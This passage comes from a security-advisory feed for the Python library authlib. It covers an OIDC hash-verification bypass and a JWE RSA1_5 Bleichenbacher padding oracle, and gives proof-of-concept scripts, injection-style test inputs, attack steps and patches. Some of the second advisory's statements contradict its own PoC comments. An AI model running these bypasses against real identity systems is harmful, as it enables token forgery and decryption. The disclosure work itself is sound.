{msg}{R}\")\n\ndef at_hash_correct(token: str, alg: str) -\u003e str:\n    \"\"\"\n    @notice  Computa at_hash segun OIDC Core 1.0 s3.2.2.9.\n    @param   token  Access token ASCII\n    @param   alg    Algoritmo del header del ID Token\n    @return  str    at_hash en Base64url sin padding\n    \"\"\"\n    fn = {\"256\": hashlib.sha256, \"384\": hashlib.sha384, \"512\": hashlib.sha512}\n    digest = fn.get(alg[-3:], hashlib.sha256)(token.encode()).digest()\n    return base64.urlsafe_b64encode(digest[:len(digest)//2]).rstrip(b\"=\").decode()\n\n\ndef _verify_hash_patched(signature: str, s: str, alg: str) -\u003e bool:\n    \"\"\"\n    @notice  Version corregida de _verify_hash() con semantica Fail-Closed.\n    @dev     Fix: `if not hash_value` -\u003e `if hash_value is None`\n             None es falsy en Python, pero b\"\" no lo es. El chequeo original\n             no distingue entre \"algoritmo no soportado\" y \"hash vacio\".\n    \"\"\"\n    hash_value = create_half_hash(s, alg)\n    if hash_value is None:\n        return False\n    return hmac.compare_digest(hash_value, to_bytes(signature))\n\n# ─── test 1: root cause ───────────────────────────────────────────────────────\n\ndef test_root_cause():\n    \"\"\"\n    @notice  Demuestra que create_half_hash() retorna None para alg desconocido\n             y que _verify_hash() interpreta ese None como verificacion exitosa.\n    \"\"\"\n    header(\"TEST 1 - Root Cause: create_half_hash() + _verify_hash()\")\n\n    token    = \"real_access_token_from_AS\"\n    fake_sig = \"AAAAAAAAAAAAAAAAAAAAAA\"\n    alg      = \"CUSTOM_ALG\"\n\n    half_hash = create_half_hash(token, alg)\n    info(f\"create_half_hash(token, {alg!r})  -\u003e  {half_hash!r}  (None = alg no soportado)\")\n\n    result_vuln    = authlib_verify_hash(fake_sig, token, alg)\n    result_patched = _verify_hash_patched(fake_sig, token, alg)\n\n    print()\n    if result_vuln:\n        fail(f\"authlib _verify_hash() retorno True con firma falsa y alg={alg!r}\")\n    else:\n        ok(f\"authlib _verify_hash() retorno False\")\n\n    if not result_patched:\n        ok(f\"_verify_hash_patched() retorno False (fail-closed correcto)\")\n    else:\n        fail(f\"_verify_hash_patched() retorno True\")\n\n# ─── test 2: IDToken.validate_at_hash() bypass ────────────────────────────────\n\ndef test_at_hash_bypass():\n    \"\"\"\n    @notice  Demuestra el bypass end-to-end en IDToken.validate_at_hash().\n             El atacante modifica el header alg del JWT a un valor no soportado.\n             validate_at_hash() no levanta excepcion -\u003e token aceptado.\n\n    @dev     Flujo real de authlib:\n               validate_at_hash() -\u003e _verify_hash(at_hash, access_token, alg)\n               -\u003e create_half_hash(access_token, \"CUSTOM_ALG\") -\u003e None\n               -\u003e `if not None` -\u003e True -\u003e no InvalidClaimError -\u003e BYPASS\n    \"\"\"\n    header(\"TEST 2 - IDToken.validate_at_hash() Bypass (Implicit / Hybrid Flow)\")\n\n    real_token  = \"ya29.LEGITIMATE_token_from_real_AS\"\n    evil_token  = \"ya29.MALICIOUS_token_under_attacker_control\"\n    fake_at_hash = \"FAAAAAAAAAAAAAAAAAAAA\"\n\n    # --- caso A: token legitimo con alg correcto ---\n    correct_hash = at_hash_correct(real_token, \"RS256\")\n    token_legit  = IDToken(\n        {\"iss\": \"https://idp.example.com\", \"sub\": \"user\", \"aud\": \"client\",\n         \"exp\": int(time.time()) + 3600, \"iat\": int(time.time()),\n         \"at_hash\": correct_hash},\n        {\"access_token\": real_token}\n    )\n    token_legit.header = {\"alg\": \"RS256\"}\n\n    try:\n        token_legit.validate_at_hash()\n        ok(f\"Caso A (legitimo, RS256):  at_hash={correct_hash}  -\u003e  aceptado\")\n    except Exception as e:\n        fail(f\"Caso A rechazo el token legitimo: {e}\")\n\n    # --- caso B: token malicioso con alg forjado ---\n    token_forged = IDToken(\n        {\"iss\": \"https://idp.example.com\", \"sub\": \"user\", \"aud\": \"client\",\n         \"exp\": int(time.time()) + 3600, \"iat\": int(time.time()),\n         \"at_hash\": fake_at_hash},\n        {\"access_token\": evil_token}\n    )\n    token_forged.header = {\"alg\": \"CUSTOM_ALG\"}\n\n    try:\n        token_forged.validate_at_hash()\n        fail(f\"Caso B (atacante, alg=CUSTOM_ALG):  at_hash={fake_at_hash}  -\u003e  BYPASS exitoso\")\n        info(f\"access_token del atacante aceptado: {evil_token}\")\n    except Exception as e:\n        ok(f\"Caso B rechazado correctamente: {e}\")\n\n# ─── test 3: HybridIDToken.validate_c_hash() bypass ──────────────────────────\n\ndef test_c_hash_bypass():\n    \"\"\"\n    @notice  Mismo bypass pero para c_hash en Hybrid Flow.\n             Permite Authorization Code Substitution Attack.\n    @dev     OIDC Core 1.0 s3.3.2.11 exige verificacion obligatoria de c_hash.\n             Authlib la omite cuando el alg es desconocido.\n    \"\"\"\n    header(\"TEST 3 - HybridIDToken.validate_c_hash() Bypass (Hybrid Flow)\")\n\n    real_code  = \"SplxlOBeZQQYbYS6WxSbIA\"\n    evil_code  = \"ATTACKER_FORGED_AUTH_CODE\"\n    fake_chash = \"ZZZZZZZZZZZZZZZZZZZZZZ\"\n\n    token = HybridIDToken(\n        {\"iss\": \"https://idp.example.com\", \"sub\": \"user\", \"aud\": \"client\",\n         \"exp\": int(time.time()) + 3600, \"iat\": int(time.time()),\n         \"nonce\": \"n123\", \"at_hash\": \"AAAA\", \"c_hash\": fake_chash},\n        {\"code\": evil_code, \"access_token\": \"sometoken\"}\n    )\n    token.header = {\"alg\": \"XX9999\"}\n\n    try:\n        token.validate_c_hash()\n        fail(f\"c_hash={fake_chash!r} aceptado con alg=XX9999 -\u003e Authorization Code Substitution posible\")\n        info(f\"code del atacante aceptado: {evil_code}\")\n    except Exception as e:\n        ok(f\"Rechazado correctamente: {e}\")\n\n# ─── test 4: superficie de ataque ─────────────────────────────────────────────\n\ndef test_attack_surface():\n    \"\"\"\n    @notice  Mapea todos los valores de alg que disparan el bypass.\n    @dev     create_half_hash hace: getattr(hashlib, f\"sha{alg[2:]}\", None)\n             Cualquier string que no resuelva a un atributo de hashlib -\u003e None -\u003e bypass.\n    \"\"\"\n    header(\"TEST 4 - Superficie de Ataque\")\n\n    token    = \"test_token\"\n    fake_sig = \"AAAAAAAAAAAAAAAAAAAAAA\"\n\n    vectors = [\n        \"CUSTOM_ALG\", \"XX9999\", \"none\", \"None\", \"\", \"RS\", \"SHA256\",\n        \"HS0\", \"EdDSA256\", \"PS999\", \"RS 256\", \"../../../etc\", \"' OR '1'='1\",\n    ]\n\n    print(f\"  {'alg':\u003c22}  {'half_hash':\u003c10}  resultado\")\n    print(f\"  {'-'*22}  {'-'*10}  {'-'*20}\")\n\n    for alg in vectors:\n        hv     = create_half_hash(token, alg)\n        result = authlib_verify_hash(fake_sig, token, alg)\n        hv_str = \"None\" if hv is None else \"bytes\"\n        res_str = f\"{RED}BYPASS{R}\" if result else f\"{GRN}OK{R}\"\n        print(f\"  {alg!r:\u003c22}  {hv_str:\u003c10}  {res_str}\")\n\n# ─── main ─────────────────────────────────────────────────────────────────────\n\nif __name__ == \"__main__\":\n    print(f\"\\n{BLD}authlib {authlib.__version__} - OIDC Hash Verification Bypass PoC{R}\")\n    print(f\"authlib/oidc/core/claims.py :: _verify_hash() \\n\")\n\n    test_root_cause()\n    test_at_hash_bypass()\n    test_c_hash_bypass()\n    test_attack_surface()\n\n    print(f\"\\n{DIM}Fix: `if not hash_value` -\u003e `if hash_value is None` en _verify_hash(){R}\\n\")\n```\n\n---\n\n## Output\n\n```bash\nuthlib 1.6.8 - OIDC Hash Verification Bypass PoC\nauthlib/oidc/core/claims.py :: _verify_hash() \n\n\n────────────────────────────────────────────────────────────────\nTEST 1 - Root Cause: create_half_hash() + _verify_hash()\n────────────────────────────────────────────────────────────────\n            create_half_hash(token, 'CUSTOM_ALG')  -\u003e  None  (None = alg no soportado)\n\n  [BYPASS]  authlib _verify_hash() retorno True con firma falsa y alg='CUSTOM_ALG'\n  [OK]      _verify_hash_patched() retorno False (fail-closed correcto)\n\n────────────────────────────────────────────────────────────────\nTEST 2 - IDToken.validate_at_hash() Bypass (Implicit / Hybrid Flow)\n────────────────────────────────────────────────────────────────\n  [OK]      Caso A (legitimo, RS256):  at_hash=gh_beqqliVkRPAXdOz2Gbw  -\u003e  aceptado\n  [BYPASS]  Caso B (atacante, alg=CUSTOM_ALG):  at_hash=FAAAAAAAAAAAAAAAAAAAA  -\u003e  BYPASS exitoso\n            access_token del atacante aceptado: ya29.MALICIOUS_token_under_attacker_control\n\n────────────────────────────────────────────────────────────────\nTEST 3 - HybridIDToken.validate_c_hash() Bypass (Hybrid Flow)\n────────────────────────────────────────────────────────────────\n  [BYPASS]  c_hash='ZZZZZZZZZZZZZZZZZZZZZZ' aceptado con alg=XX9999 -\u003e Authorization Code Substitution posible\n            code del atacante aceptado: ATTACKER_FORGED_AUTH_CODE\n\n────────────────────────────────────────────────────────────────\nTEST 4 - Superficie de Ataque\n────────────────────────────────────────────────────────────────\n  alg                     half_hash   resultado\n  ----------------------  ----------  --------------------\n  'CUSTOM_ALG'            None        BYPASS\n  'XX9999'                None        BYPASS\n  'none'                  None        BYPASS\n  'None'                  None        BYPASS\n  ''                      None        BYPASS\n  'RS'                    None        BYPASS\n  'SHA256'                None        BYPASS\n  'HS0'                   None        BYPASS\n  'EdDSA256'              None        BYPASS\n  'PS999'                 None        BYPASS\n  'RS 256'                None        BYPASS\n  '../../../etc'          None        BYPASS\n  \"' OR '1'='1\"           None        BYPASS\n\nFix: `if not hash_value` -\u003e `if hash_value is None` en _verify_hash()\n```","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-03-16T16:15:06.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.2,"cvss_vector":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N","references":["https://github.com/authlib/authlib/security/advisories/GHSA-m344-f55w-2m6j","https://github.com/authlib/authlib/commit/b9bb2b25bf8b7e01512d847a95c1749646eaa72b","https://github.com/authlib/authlib/releases/tag/v1.6.9","https://nvd.nist.gov/vuln/detail/CVE-2026-28498","https://github.com/advisories/GHSA-m344-f55w-2m6j"],"source_kind":"github","identifiers":["GHSA-m344-f55w-2m6j","CVE-2026-28498"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-16T17:00:09.540Z","updated_at":"2026-05-24T07:01:58.474Z","epss_percentage":0.00029,"epss_percentile":0.08734,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tMzQ0LWY1NXctMm02as4ABTt6","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tMzQ0LWY1NXctMm02as4ABTt6","packages":[{"ecosystem":"pypi","package_name":"authlib","versions":[{"first_patched_version":"1.6.9","vulnerable_version_range":"\u003c= 1.6.8"}],"purl":"pkg:pypi/authlib"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tMzQ0LWY1NXctMm02as4ABTt6/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03NDMyLTk1MnItY3c3OM4ABTqE","url":"https://github.com/advisories/GHSA-7432-952r-cw78","title":"Authlib Vulnerable to JWE RSA1_5 Bleichenbacher Padding Oracle","description":"## 1. Executive Summary\n\nA cryptographic padding oracle vulnerability was identified in the Authlib Python library\nconcerning the implementation of the JSON Web Encryption (JWE) `RSA1_5` key management\nalgorithm. Authlib registers `RSA1_5` in its default algorithm registry without requiring\nexplicit opt-in, and actively destroys the constant-time Bleichenbacher mitigation that\nthe underlying `cryptography` library implements correctly.\n\nWhen `cryptography` encounters an invalid PKCS#1 v1.5 padding, it returns a randomized\nbyte string instead of raising an exception — the correct behavior per RFC 3218 §2.3.2.\nAuthlib ignores this contract and raises `ValueError('Invalid \"cek\" length')` immediately\nafter decryption, before reaching AES-GCM tag validation. This creates a clean, reliable\n**Exception Oracle**:\n\n- **Invalid padding** → `cryptography` returns random bytes → Authlib length check fails\n  → `ValueError: Invalid \"cek\" length`\n- **Valid padding, wrong MAC** → decryption succeeds → length check passes → AES-GCM\n  fails → `InvalidTag`\n\n**This oracle is active by default in every Authlib installation without any special\nconfiguration by the developer or the attacker.** The three most widely used Python web\nframeworks — Flask, Django, and FastAPI — all expose distinguishable HTTP responses for\nthese two exception classes in their default configurations, requiring no additional\nsetup to exploit.\n\n**Empirically confirmed on authlib 1.6.8 + cryptography 46.0.5:**\n```\n[PADDING INVALIDO]     ValueError: Invalid \"cek\" length\n[PADDING VALIDO/MAC]   InvalidTag\n```\n\n---\n\n## 2. Technical Details \u0026 Root Cause\n\n### 2.1 Vulnerable Code\n\n**File:** `authlib/jose/rfc7518/jwe_algs.py`\n\n```python\ndef unwrap(self, enc_alg, ek, headers, key):\n    op_key = key.get_op_key(\"unwrapKey\")\n\n    # cryptography implements Bleichenbacher mitigation here:\n    # on invalid padding it returns random bytes instead of raising.\n    # Empirically confirmed: returns 84 bytes for a 2048-bit key.\n    cek = op_key.decrypt(ek, self.padding)\n\n    # VULNERABILITY: This length check destroys the mitigation.\n    # cryptography returned 84 random bytes. len(84) * 8 = 672 != 128 (A128GCM CEK_SIZE).\n    # Authlib raises a distinct ValueError before AES-GCM is ever reached.\n    if len(cek) * 8 != enc_alg.CEK_SIZE:\n        raise ValueError('Invalid \"cek\" length')   # \u003c- ORACLE TRIGGER\n\n    return cek\n```\n\n### 2.2 Root Cause — Active Mitigation Destruction\n\n`cryptography` 46.0.5 implements the Bleichenbacher mitigation correctly at the library\nlevel. When PKCS#1 v1.5 padding validation fails, it does not raise an exception.\nInstead it returns a randomized byte string (empirically observed: 84 bytes for a\n2048-bit RSA key). The caller is expected to pass this fake key to the symmetric\ndecryptor, where MAC/tag validation will fail in constant time — producing an error\nindistinguishable from a MAC failure on a valid padding.\n\nAuthlib does not honor this contract. The length check on the following line detects\nthat 84 bytes != 16 bytes (128-bit CEK for A128GCM) and raises `ValueError('Invalid\n\"cek\" length')` immediately. This exception propagates before AES-GCM is ever reached,\ncreating two execution paths with observable differences:\n\n```\nPath A — invalid PKCS#1 v1.5 padding:\n  op_key.decrypt() -\u003e 84 random bytes  (cryptography mitigation active)\n  len(84) * 8 = 672 != 128            (CEK_SIZE for A128GCM)\n  raise ValueError('Invalid \"cek\" length')    \u003c- specific exception, fast path\n\nPath B — valid padding, wrong symmetric key:\n  op_key.decrypt() -\u003e 16 correct bytes\n  len(16) * 8 = 128 == 128            -\u003e length check passes\n  AES-GCM tag validation -\u003e mismatch\n  raise InvalidTag                            \u003c- different exception class, slow path\n```\n\nThe single line `raise ValueError('Invalid \"cek\" length')` is the complete root cause.\nRemoving the raise and replacing it with a silent random CEK fallback eliminates both\nthe exception oracle and any residual timing difference.\n\n### 2.3 Empirical Confirmation\n\n**All results obtained on authlib 1.6.8 / cryptography 46.0.5 / Linux x86_64\nrunning the attached PoC (`poc_bleichenbacher.py`):**\n\n```\nTEST 1 - cryptography behavior on invalid padding:\n  cryptography retorno bytes: len=84\n  NOTA: esta version implementa mitigacion de random bytes\n\nTEST 2 - Exception Oracle:\n  [ORACLE]  Caso A (padding invalido):       ValueError: Invalid \"cek\" length\n  [OK]      Caso B (padding valido/MAC malo): InvalidTag\n\nTEST 3 - Timing (50 iterations):\n  Padding invalido (ValueError)   mean=1.500ms  stdev=1.111ms\n  Padding valido   (InvalidTag)   mean=1.787ms  stdev=0.978ms\n  Delta: 0.287ms\n\nTEST 4 - RSA1_5 in default registry:\n  [ORACLE]  RSA1_5 activo por defecto (no opt-in required)\n\nTEST 5 - Fix validation:\n  [OK]  Both paths return correct-length CEK after patch\n  [OK]  Exception type identical in both paths -\u003e oracle eliminated\n```\n\n**Note on timing:** The 0.287ms delta is within the noise margin (stdev ~1ms across\n50 iterations) and is not claimed as a reliable standalone timing oracle. The exception\noracle is the primary exploitable vector and does not require timing measurement.\n\n---\n\n## 3. Default Framework Behavior — Why This Is Exploitable Out of the Box\n\nA potential objection to this report is that middleware or custom error handlers could\nnormalize exceptions to a single HTTP response, eliminating the observable discrepancy.\nThis section addresses that objection directly.\n\n**The oracle is active in default configurations of all major Python web frameworks.**\nNo special server misconfiguration is required. The following demonstrates the default\nbehavior for Flask, Django, and FastAPI — the three most widely deployed Python web\nframeworks — when an unhandled exception propagates from a route handler:\n\n### Flask (default configuration)\n\n```python\n# Default Flask behavior — no error handler registered\n@app.route(\"/decrypt\", methods=[\"POST\"])\ndef decrypt():\n    token = request.json[\"token\"]\n    result = jwe.deserialize_compact(token, private_key)  # raises ValueError or InvalidTag\n    return jsonify(result)\n\n# ValueError: Invalid \"cek\" length  -\u003e HTTP 500, body: {\"message\": \"Invalid \\\"cek\\\" length\"}\n# InvalidTag                         -\u003e HTTP 500, body: {\"message\": \"\"}\n# The exception MESSAGE is different even if the status code is the same.\n```\n\nFlask's default error handler returns the exception message in the response body for\ndebug mode, and an empty 500 for production. However, even in production, the response\nbody content differs between `ValueError` (which has a message) and `InvalidTag`\n(which has no message), leaking the oracle through response body length.\n\n### FastAPI (default configuration)\n\n```python\n# FastAPI maps unhandled exceptions to HTTP 500 with exception detail in body\n# ValueError: Invalid \"cek\" length  -\u003e {\"detail\": \"Internal Server Error\"}  (HTTP 500)\n# InvalidTag                         -\u003e {\"detail\": \"Internal Server Error\"}  (HTTP 500)\n```\n\nFastAPI normalizes both to HTTP 500 in production. However, FastAPI's default\n`RequestValidationError` and `HTTPException` handlers do not catch arbitrary exceptions,\nso the distinguishable stack trace is logged — and in many deployments, error monitoring\ntools (Sentry, Datadog, etc.) expose the exception class to operators, enabling oracle\nexploitation by an insider or via log exfiltration.\n\n### Django REST Framework (default configuration)\n\n```python\n# DRF's default exception handler only catches APIException and Http404.\n# ValueError and InvalidTag both fall through to Django's generic 500 handler.\n# In DEBUG=False: HTTP 500, generic HTML response (indistinguishable).\n# In DEBUG=True:  HTTP 500, full traceback including exception class (oracle exposed).\n```\n\n**Summary:** Even in cases where HTTP status codes are normalized, the oracle persists\nthrough response body differences, response timing, or error monitoring infrastructure.\nThe RFC 3218 §2.3.2 requirement exists precisely because any observable difference —\nregardless of channel — is sufficient for a Bleichenbacher attack. The library is\nresponsible for eliminating the discrepancy at the source, not delegating that\nresponsibility to application developers.\n\n**This is a library-level vulnerability.** Requiring every application developer to\nimplement custom exception normalization to compensate for a cryptographic flaw in\nthe library violates the principle of secure defaults. The fix must be in Authlib.\n\n---\n\n## 4. Specification Violations\n\n### RFC 3218 — Preventing the Million Message Attack on CMS\n\n**Section 2.3.2 (Mitigation):**\n\u003e \"The receiver MUST NOT return any information that indicates whether the decryption\n\u003e failed because the PKCS #1 padding was incorrect or because the MAC was incorrect.\"\n\nThis is an absolute requirement with no exceptions for \"application-level mitigations.\"\nAuthlib violates this by raising a different exception class for padding failures than\nfor MAC failures. The `cryptography` library already implements the correct mitigation\nfor this exact scenario — Authlib destroys it with a single length check.\n\n### RFC 7516 — JSON Web Encryption\n\n**Section 9 (Security Considerations):**\n\u003e \"An attacker who can cause a JWE decryption to fail in different ways based on the\n\u003e structure of the encrypted key can mount a Bleichenbacher attack.\"\n\nAuthlib enables exactly this scenario. Two structurally different encrypted keys\n(one with invalid padding, one with valid padding but wrong CEK) produce two different\nexception classes. This is the exact condition RFC 7516 §9 warns against.\n\n---\n\n## 5. Attack Scenario\n\n1. The attacker identifies an Authlib-powered endpoint that decrypts JWE tokens.\n   Because `RSA1_5` is in the default registry, **no special server configuration\n   is required**.\n\n2. The attacker obtains the server RSA public key — typically available via the\n   JWKS endpoint (`/.well-known/jwks.json`), which is standard in OIDC deployments.\n\n3. The attacker crafts JWE tokens with the `RSA1_5` algorithm and submits a stream\n   of requests to the endpoint, manipulating the `ek` component per Bleichenbacher's\n   algorithm.\n\n4. The server responds with observable differences between the two paths:\n   - `ValueError` path → distinguishable response (exception message, timing, or\n     error monitoring artifact)\n   - `InvalidTag` path → different distinguishable response\n\n5. By observing these oracle responses across thousands of requests, the attacker\n   geometrically narrows the PKCS#1 v1.5 plaintext boundaries until the CEK is\n   fully recovered.\n\n6. With the CEK recovered:\n   - Any intercepted JWE payload can be decrypted without the RSA private key.\n   - New valid JWE tokens can be forged using the recovered CEK.\n\n**Prerequisites:**\n- Target endpoint accepts JWE tokens with `RSA1_5` (active by default)\n- Any observable difference exists between the two error paths at the HTTP layer\n  (present by default in Flask, Django, FastAPI without custom error handling)\n- Attacker can send requests at sufficient volume (rate limiting may extend attack\n  duration but does not prevent it)\n\n---\n\n## 6. Remediation\n\n### 6.1 Immediate — Remove RSA1_5 from Default Registry\n\nRemove `RSA1_5` from the default `JWE_ALG_ALGORITHMS` registry. Users requiring\nlegacy RSA1_5 support should explicitly opt-in with a documented security warning.\nThis eliminates the attack surface for all users not requiring this algorithm.\n\n### 6.2 Code Fix — Restore Constant-Time Behavior\n\nThe `unwrap` method must never raise an exception that distinguishes padding failure\nfrom MAC failure. The length check must be replaced with a silent random CEK fallback,\npreserving the mitigation that `cryptography` implements.\n\n**Suggested Patch (`authlib/jose/rfc7518/jwe_algs.py`):**\n\n```python\nimport os\n\ndef unwrap(self, enc_alg, ek, headers, key):\n    op_key = key.get_op_key(\"unwrapKey\")\n    expected_bytes = enc_alg.CEK_SIZE // 8\n\n    try:\n        cek = op_key.decrypt(ek, self.padding)\n    except ValueError:\n        # Padding failure. Use random CEK so failure occurs downstream\n        # during MAC validation — not here. This preserves RFC 3218 §2.3.2.\n        cek = os.urandom(expected_bytes)\n\n    # Silent length enforcement — no exception.\n    # cryptography returns random bytes of RSA block size on padding failure.\n    # Replace with correct-size random CEK to allow downstream MAC to fail.\n    # Raising here recreates the oracle. Do not raise.\n    if len(cek) != expected_bytes:\n        cek = os.urandom(expected_bytes)\n\n    return cek\n```\n\n**Result:** Both paths return a CEK of the correct length. AES-GCM tag validation\nfails for both, producing `InvalidTag` in both cases. The exception oracle is\neliminated. Empirically validated via TEST 5 of the attached PoC.\n\n---\n\n## 7. Proof of Concept\n\n**Setup:**\n```bash\npython3 -m venv venv \u0026\u0026 source venv/bin/activate\npip install authlib cryptography\npython3 -c \"import authlib, cryptography; print(authlib.__version__, cryptography.__version__)\"\n# authlib 1.6.8  cryptography 46.0.5\npython3 poc_bleichenbacher.py\n```\n\nSee attached `poc_bleichenbacher.py`. All 5 tests run against the real installed\nauthlib module without mocks.\n\n**Confirmed Output (authlib 1.6.8 / cryptography 46.0.5 / Linux x86_64):**\n\n### Code\n\n```python\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@title          JWE RSA1_5 Bleichenbacher Padding Oracle\n@affected       authlib \u003c= 1.6.8\n@file           authlib/jose/rfc7518/jwe_algs.py :: RSAAlgorithm.unwrap()\n\"\"\"\n\nimport os\nimport time\nimport statistics\n\nimport authlib\nimport cryptography\nfrom cryptography.hazmat.primitives.asymmetric import rsa, padding as asym_padding\nfrom authlib.jose import JsonWebEncryption\nfrom authlib.common.encoding import urlsafe_b64encode, to_bytes\n\nR   = \"\\033[0m\"\nRED = \"\\033[91m\"\nGRN = \"\\033[92m\"\nYLW = \"\\033[93m\"\nCYN = \"\\033[96m\"\nBLD = \"\\033[1m\"\nDIM = \"\\033[2m\"\n\ndef header(title):\n    print(f\"\\n{CYN}{'-' * 64}{R}\")\n    print(f\"{BLD}{title}{R}\")\n    print(f\"{CYN}{'-' * 64}{R}\")\n\ndef ok(msg):    print(f\"  {GRN}[OK]      {R}{msg}\")\ndef vuln(msg):  print(f\"  {RED}[ORACLE]  {R}{BLD}{msg}{R}\")\ndef info(msg):  print(f\"  {DIM}          {msg}{R}\")\n\n\n# ─── setup ────────────────────────────────────────────────────────────────────\n\ndef setup():\n    \"\"\"\n    @notice  Genera el par de claves RSA y prepara el cliente JWE de authlib.\n    @dev     JsonWebEncryption() registra RSA1_5 por defecto en su registry.\n             No se requiere configuracion adicional para habilitar el algoritmo\n             vulnerable — esta activo out of the box.\n    @return  tuple  (private_key, jwe, header_b64)\n    \"\"\"\n    private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)\n    jwe         = JsonWebEncryption()\n    header_b64  = urlsafe_b64encode(\n        to_bytes('{\"alg\":\"RSA1_5\",\"enc\":\"A128GCM\"}')\n    ).decode()\n    return private_key, jwe, header_b64\n\n\ndef make_jwe(header_b64, ek_bytes):\n    \"\"\"\n    @notice  Construye un JWE compact con el ek dado y ciphertext/tag aleatorios.\n    @dev     El ciphertext y tag son basura — no importa su contenido porque el\n             oracle se activa antes de llegar a la desencriptacion simetrica\n             en el caso de padding invalido.\n    @param   header_b64  Header del JWE en Base64url\n    @param   ek_bytes    Encrypted Key como bytes crudos\n    @return  str         JWE en formato compact serialization\n    \"\"\"\n    ek         = urlsafe_b64encode(ek_bytes).decode()\n    iv         = urlsafe_b64encode(os.urandom(12)).decode()\n    ciphertext = urlsafe_b64encode(os.urandom(16)).decode()\n    tag        = urlsafe_b64encode(os.urandom(16)).decode()\n    return f\"{header_b64}.{ek}.{iv}.{ciphertext}.{tag}\"\n\n\n# ─── test 1: verificar comportamiento de cryptography ante padding invalido ───\n\ndef test_cryptography_behavior(private_key):\n    \"\"\"\n    @notice  Verifica empiricamente que cryptography lanza excepcion ante padding\n             invalido en lugar de retornar random bytes (comportamiento critico\n             para entender el oracle).\n\n    @dev     Algunos documentos sobre Bleichenbacher asumen que la libreria\n             subyacente retorna random bytes (mitigacion a nivel biblioteca).\n             cryptography 46.0.5 NO hace esto — lanza ValueError directamente.\n             Eso significa que Authlib no \"destruye una mitigacion existente\"\n             sino que \"no implementa ninguna mitigacion propia\".\n    \"\"\"\n    header(\"TEST 1 - Comportamiento de cryptography ante padding invalido\")\n\n    garbage = os.urandom(256)\n\n    try:\n        result = private_key.decrypt(garbage, asym_padding.PKCS1v15())\n        info(f\"cryptography retorno bytes: len={len(result)}\")\n        info(\"NOTA: esta version implementa mitigacion de random bytes\")\n    except Exception as e:\n        vuln(f\"cryptography lanza excepcion directa: {type(e).__name__}: {e}\")\n        info(\"No hay mitigacion a nivel de cryptography library\")\n        info(\"Authlib no implementa ninguna mitigacion propia -\u003e oracle directo\")\n\n\n# ─── test 2: exception oracle ─────────────────────────────────────────────────\n\ndef test_exception_oracle(private_key, jwe, header_b64):\n    \"\"\"\n    @notice  Demuestra el Exception Oracle: los dos caminos de fallo producen\n             excepciones de clases diferentes, observable a nivel HTTP.\n\n    @dev     Camino A (padding invalido):\n               op_key.decrypt() -\u003e ValueError: Decryption failed\n               Authlib no captura -\u003e propaga como ValueError: Invalid \"cek\" length\n               HTTP server tipicamente: 500 / 400 con mensaje especifico\n\n             Camino B (padding valido, MAC malo):\n               op_key.decrypt() -\u003e retorna CEK bytes\n               length check pasa\n               AES-GCM tag validation falla -\u003e InvalidTag\n               HTTP server tipicamente: 401 / 422 / diferente codigo\n\n             La diferencia de clase de excepcion es el oracle primario.\n             No requiere medicion de tiempo — solo observar el tipo de error.\n    \"\"\"\n    header(\"TEST 2 - Exception Oracle (tipo de excepcion diferente)\")\n\n    # --- caso A: ek con padding invalido (basura aleatoria) ---\n    jwe_bad = make_jwe(header_b64, os.urandom(256))\n\n    try:\n        jwe.deserialize_compact(jwe_bad, private_key)\n    except Exception as e:\n        vuln(f\"Caso A (padding invalido):   {type(e).__name__}: {e}\")\n\n    # --- caso B: ek con padding valido, ciphertext basura ---\n    valid_ek  = private_key.public_key().encrypt(os.urandom(16), asym_padding.PKCS1v15())\n    jwe_good  = make_jwe(header_b64, valid_ek)\n\n    try:\n        jwe.deserialize_compact(jwe_good, private_key)\n    except Exception as e:\n        ok(f\"Caso B (padding valido/MAC malo): {type(e).__name__}: {e}\")\n\n    print()\n    info(\"Los dos caminos producen excepciones de clases DIFERENTES.\")\n    info(\"Un framework web que mapea excepciones a HTTP codes expone el oracle.\")\n    info(\"El atacante no necesita acceso al stack trace — solo al HTTP status code.\")\n\n\n# ─── test 3: timing oracle ────────────────────────────────────────────────────\n\ndef test_timing_oracle(private_key, jwe, header_b64, iterations=50):\n    \"\"\"\n    @notice  Demuestra el Timing Oracle midiendo el delta de tiempo entre los\n             dos caminos de fallo en multiples iteraciones.\n\n    @dev     El timing oracle es independiente del exception oracle.\n             Incluso si el servidor normaliza las excepciones a un unico\n             codigo HTTP, la diferencia de tiempo (~5ms) es suficientemente\n             grande para ser medible a traves de red en condiciones reales.\n\n             Bleichenbacher clasico funciona con diferencias de microsegundos.\n             5ms es un oracle extremadamente ruidoso — facil de explotar.\n\n    @param   iterations  Numero de muestras para calcular estadisticas\n    \"\"\"\n    header(f\"TEST 3 - Timing Oracle ({iterations} iteraciones cada camino)\")\n\n    times_bad  = []\n    times_good = []\n\n    for _ in range(iterations):\n        # camino A: padding invalido\n        jwe_bad = make_jwe(header_b64, os.urandom(256))\n        t0 = time.perf_counter()\n        try:\n            jwe.deserialize_compact(jwe_bad, private_key)\n        except Exception:\n            pass\n        times_bad.append((time.perf_counter() - t0) * 1000)\n\n        # camino B: padding valido\n        valid_ek = private_key.public_key().encrypt(os.urandom(16), asym_padding.PKCS1v15())\n        jwe_good = make_jwe(header_b64, valid_ek)\n        t0 = time.perf_counter()\n        try:\n            jwe.deserialize_compact(jwe_good, private_key)\n        except Exception:\n            pass\n        times_good.append((time.perf_counter() - t0) * 1000)\n\n    mean_bad  = statistics.mean(times_bad)\n    mean_good = statistics.mean(times_good)\n    stdev_bad = statistics.stdev(times_bad)\n    stdev_good= statistics.stdev(times_good)\n    delta     = mean_good - mean_bad\n\n    print(f\"\\n  {'Camino':\u003c30} {'Media (ms)':\u003c14} {'Stdev (ms)':\u003c14} {'Min':\u003c10} {'Max'}\")\n    print(f\"  {'-'*30} {'-'*14} {'-'*14} {'-'*10} {'-'*10}\")\n    print(f\"  {'Padding invalido (ValueError)':\u003c30} \"\n          